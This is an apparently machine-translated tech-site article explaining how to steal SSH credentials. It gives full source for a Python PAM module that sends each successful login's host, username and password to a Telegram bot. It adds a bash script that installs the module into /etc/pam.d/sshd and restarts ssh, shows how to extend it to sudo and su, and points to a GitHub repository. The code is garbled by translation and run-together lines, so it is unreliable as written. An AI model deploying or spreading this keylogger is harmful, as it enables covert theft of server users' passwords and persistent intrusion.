In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-01-18 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Development >
Share
Shulou(Shulou.com)06/02 Report--
This article will explain in detail what the method of stealing SSH vouchers is, the content of the article is of high quality, so the editor will share it with you for reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.
I'm going to introduce you to another way to get the ssh password. I found this method at ChokePoint, and he showed us how to use python to create a PAM module to record failed attempts, and now all I have to do is change the login password. The auth_log function used in the original script when login fails.
If not check_pw (user, resp.resp): auth_log ("Remote Host:% s (% SVA% s)"% (pamh.rhost, user, resp.resp)) return pamh.PAM_AUTH_ERRreturn pamh.PAM_SUCCESS
In my script, when the login is successful, I use the function sendMessage that I defined
If not check_pw (user, resp.resp): return pamh.PAM_AUTH_ERR sendMessage ("Connection from host {} user: {} password: {})" .format (pamh.rhost, user, resp.resp) return pamh.PAM_SUCCESS
This function is mainly used to send the IP of the user, password and connection. The following is the complete code:
Import spwdimport cryptimport requestsdef sendMessage (msg): apiKey = 'BOT-API-KEY' userId =' USERID' url = 'https://api.telegram.org/bot{}/sendMessage?chat_id={}&text={}'.format(apiKey,userId,msg) r = requests.get (url) def check_pw (user, password): "" Check the password matches local unix password on file "" hashed_pw = spwd.getspnam (user) [1] return crypt.crypt (password) Hashed_pw) = hashed_pwdef pam_sm_authenticate (pamh, flags, argv): try: user = pamh.get_user () except pamh.exception as e: return e.pam_result if not user: return pamh.PAM_USER_UNKNOWN try: resp = pamh.conversation (pamh.Message (pamh.PAM_PROMPT_ECHO_OFF) 'Password:')) except pamh.exception as e: return e.pam_result if not check_pw (user, resp.resp): return pamh.PAM_AUTH_ERR sendMessage ("Connection from host {} user: {} password: {})" .format (pamh.rhost, user, resp.resp) return pamh.PAM_SUCCESSdef pam_sm_setcred (pamh, flags, argv): return pamh.PAM_SUCCESSdef pam_sm_acct_mgmt (pamh, flags Argv): return pamh.PAM_SUCCESSdef pam_sm_open_session (pamh, flags, argv): return pamh.PAM_SUCCESSdef pam_sm_close_session (pamh, flags, argv): return pamh.PAM_SUCCESSdef pam_sm_chauthtok (pamh, flags, argv): return pamh.PAM_SUCCESS
I also created a bash script to automate the installation of the ssh keylogger, where all the dependencies were installed, and configured the PAM module on / etc/pam.d/sshd
#! / bin/bash# Install dependencies to create a PAM module using python (Except for python-pip) apt-get install python-pam libpam-python python-pip# Install dependencies pythonpip install requests# Check if exist the entrie on pam, for this moduleif! Grep-Fq "looter.py" / etc/pam.d/sshd Then sed-I "/ common-auth/an auth requisite pam_python.so looter.py" / etc/pam.d/sshdficode='import spwdimport cryptimport requestsdef sendMessage (msg): apiKey = "API-KEY" userId = "USER-ID" data = {"chat_id": userId, "text": msg} url = "https://api.telegram.org/bot{}/sendMessage".format(apiKey) r = requests.post (url,json=data) def check_pw (user) Password): "Check the password matches local unix password on file" hashed_pw = spwd.getspnam (user) [1] return crypt.crypt (password, hashed_pw) = = hashed_pwdef pam_sm_authenticate (pamh, flags) Argv): try: user = pamh.get_user () except pamh.exception as e: return e.pam_result if not user: return pamh.PAM_USER_UNKNOWN try: resp = pamh.conversation (pamh.Message (pamh.PAM_PROMPT_ECHO_OFF, "Password:")) except pamh.exception as e: return e.pam_result if not check_pw (user Resp.resp): return pamh.PAM_AUTH_ERR sendMessage ("Connection from host {} using the user {} and password {}" .format (pamh.rhost, user, resp.resp) return pamh.PAM_SUCCESSdef pam_sm_setcred (pamh, flags, argv): return pamh.PAM_SUCCESSdef pam_sm_acct_mgmt (pamh, flags, argv): return pamh.PAM_SUCCESSdef pam_sm_open_session (pamh, flags) Argv): return pamh.PAM_SUCCESSdef pam_sm_close_session (pamh, flags, argv): return pamh.PAM_SUCCESSdef pam_sm_chauthtok (pamh, flags, argv): return pamh.PAM_SUCCESS'mkdir-p / lib/security/echo "$code" > / lib/security/looter.py/etc/init.d/ssh restart
Now, as long as someone successfully logs in to the server, you will receive the following login information.
It also works for sudo and su, just add the following code
Auth requisite pam_python.so looter.py
To the following two files
/ etc/pam.d/sudo/etc/pam.d/su
Or you can git clone the project directly and follow the instructions on README.md
Git clone https://github.com/mthbernardes/sshLooter.git about the method of stealing SSH credentials is shared here, I hope that the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
